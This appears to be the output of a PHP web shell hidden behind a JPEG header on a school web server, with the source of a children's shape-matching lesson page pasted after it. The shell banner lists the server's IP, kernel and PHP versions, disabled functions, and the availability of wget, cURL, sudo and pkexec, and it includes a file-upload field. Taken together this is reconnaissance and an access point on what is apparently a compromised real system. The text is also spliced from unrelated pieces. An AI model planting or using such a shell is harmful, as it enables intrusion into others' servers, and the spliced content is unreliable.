????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.141.164.253 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelA/Category2/ |
Upload File : |
<!doctype html> <html> <head> <title>Match the buns and shapes</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style> .id_td { border: 1px; text-align:center; } .style_borderNone { border:none; border-collapse:collapse; } </style> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.A, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 23), true, true); shared_setFooterTable('id_tblFooter', true, true, false, false, false); var ids_headings = ['id_td_heading1']; var ids_boxes = ['id_BoxForCircle', 'id_BoxForRectangle', 'id_BoxForTriangle', 'id_BoxForSquare']; var ids_All = ids_headings.concat(ids_boxes); shared_adjust_fontSize_for_ids_all_devices(ids_All, 80); shared_init_dropBox_tds_with_drag_here(ids_boxes); var id_tables_array = ['id_table1', 'id_table2']; shared_border_collapse_for_tables_for_all(id_tables_array); if (shared_currentDeviceOS != shared_deviceOS_Android) { var eTd = document.getElementById('id_td1'); eTd.style.paddingBottom = '0px'; } shared_setTablesHeightsForIE(); } function page_onLoad() { } function btnPrevious_click() { window.location = "LevelACat2Lesson22.html"; } function btnHome_click() { shared_btnHomeCategories_click('LevelA'); } function DragDrop(id_dropBox, id_imgElement, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_dragDropImageAndIsMovedTrue(shared_currentDropingId, id_dropBox, id_imgElement); isAllInfosMovedShowClapsAnimation(); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_BoxForCircle', 'id_BoxForRectangle', 'id_BoxForTriangle', 'id_BoxForSquare']; shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" hieghtForIE="84%" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td class="style_borderNone"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-left: none; border-right: none; border-top: none"> <tr> <td id="id_td_heading1" class="shared_style_options_blue_24px_bold" style="border: none"><u>Match the </u><span style="color: red"><u>Bun</u></span><u>s with shapes:</u></td> </tr> </table> </td> </tr> <tr height="*" hieghtForIE="95%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr height="20%" > <td id="id_td1"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_Triangle" class="id_td" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_SpanImgTriangle"> <img id="id_imgTriangle" src="../../../img/LevelA/Category2/LevelACat2Lesson23/triangle.png" width="50%"> </span> </td> <td id="id_td_Square" class="id_td" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_SpanImgSquare"> <img id="id_imgSquare" src="../../../img/LevelA/Category2/LevelACat2Lesson23/square.png" width="50%"> </span> </td> <td id="id_td_Circle" class="id_td" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_SpanImgCircle"> <img id="id_imgCircle" src="../../../img/LevelA/Category2/LevelACat2Lesson23/circle.png" width="60%"> </span> </td> <td id="id_td_Rectangle" class="id_td" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_SpanImgRectangle"> <img id="id_imgRectangle" src="../../../img/LevelA/Category2/LevelACat2Lesson23/rectangle.png" width="50%"> </span> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*" hieghtForIE="80%"> <td> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr id="id_tr_Circle" height="25%" ondragover="shared_highlight('id_BoxForCircle'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForCircle')" ondrop="DragDrop('id_BoxForCircle', 'id_imgCircle', ['id_SpanImgCircle'])"> <td width="50%" align="center"> <img id="id_imgCircleBun" src="../../../img/LevelA/Category2/LevelACat2Lesson23/circleBun.png" width="40%" draggable="false"> </td> <td width="*" id="id_BoxForCircle" class="cls_BoxForCircle shared_style_red_24px_bold" style="text-align:center"> </td> </tr> <tr id="id_tr_Rectangle" height="25%" ondragover="shared_highlight('id_BoxForRectangle'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForRectangle')" ondrop="DragDrop('id_BoxForRectangle', 'id_imgRectangle', ['id_SpanImgRectangle'])"> <td width="50%" align="center"> <img id="id_imgRectangleBun" src="../../../img/LevelA/Category2/LevelACat2Lesson23/rectangleBun.png" width="40%" draggable="false"> </td> <td width="*" id="id_BoxForRectangle" class="cls_BoxForRectangle shared_style_red_24px_bold" style="text-align:center"> </td> </tr> <tr id="id_tr_Triangle" height="25%" ondragover="shared_highlight('id_BoxForTriangle'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForTriangle')" ondrop="DragDrop('id_BoxForTriangle', 'id_imgTriangle', ['id_SpanImgTriangle'])"> <td width="50%" align="center"> <img id="id_imgTriangleBun" src="../../../img/LevelA/Category2/LevelACat2Lesson23/triangleBun.png" width="40%" draggable="false"> </td> <td width="*" id="id_BoxForTriangle" class="cls_BoxForTriangle shared_style_red_24px_bold" style="text-align:center"> </td> </tr> <tr id="id_tr_Square" height="*" hieghtForIE="25%" ondragover="shared_highlight('id_BoxForSquare'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForSquare')" ondrop="DragDrop('id_BoxForSquare', 'id_imgSquare', ['id_SpanImgSquare'])"> <td width="50%" align="center"> <img id="id_imgSquareBun" src="../../../img/LevelA/Category2/LevelACat2Lesson23/squareBun.png" width="40%" draggable="false"> </td> <td width="*" id="id_BoxForSquare" class="cls_BoxForSquare shared_style_red_24px_bold" style="text-align:center"> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_SpanImgTriangle', {handle : 'id_td_Triangle', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanImgSquare', {handle : 'id_td_Square', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanImgCircle', {handle : 'id_td_Circle', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_SpanImgRectangle', {handle : 'id_td_Rectangle', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_tr_Circle', {onOver : function(){shared_highlight('id_BoxForCircle')}, onOut : function(){shared_un_highlight('id_BoxForCircle')}, onDrop : function(){DragDrop('id_BoxForCircle', 'id_imgCircle', ['id_SpanImgCircle'])}}); webkit_drop.add('id_tr_Rectangle', {onOver : function(){shared_highlight('id_BoxForRectangle')}, onOut : function(){shared_un_highlight('id_BoxForRectangle')}, onDrop : function(){DragDrop('id_BoxForRectangle', 'id_imgRectangle', ['id_SpanImgRectangle'])}}); webkit_drop.add('id_tr_Triangle', {onOver : function(){shared_highlight('id_BoxForTriangle')}, onOut : function(){shared_un_highlight('id_BoxForTriangle')}, onDrop : function(){DragDrop('id_BoxForTriangle', 'id_imgTriangle', ['id_SpanImgTriangle'])}}); webkit_drop.add('id_tr_Square', {onOver : function(){shared_highlight('id_BoxForSquare')}, onOut : function(){shared_un_highlight('id_BoxForSquare')}, onDrop : function(){DragDrop('id_BoxForSquare', 'id_imgSquare', ['id_SpanImgSquare'])}}); </script> </body> </html>